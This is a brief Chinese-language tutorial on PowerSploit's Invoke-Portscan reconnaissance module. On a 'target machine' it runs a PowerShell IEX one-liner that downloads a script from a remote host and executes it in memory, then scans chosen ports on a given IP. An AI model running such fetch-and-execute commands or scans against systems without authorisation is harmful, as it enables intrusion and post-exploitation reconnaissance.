1. Invoke-Portscan模块
Invoke-Portscan是Recon模块下的一个脚本,主要用于端口扫描。
2. 在目标机上下载portscan脚本
PS C:\Users\Administrator> IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/Recon/Invoke-Portscan.ps1")
3. 运行脚本扫描
-hosts参数指定要扫描的IP地址,多个地址可用逗号分隔
-ports参数指定要扫描的端口
PS C:\Users\Administrator> Invoke-Portscan -hosts 192.168.101.46 -ports "80,22,443"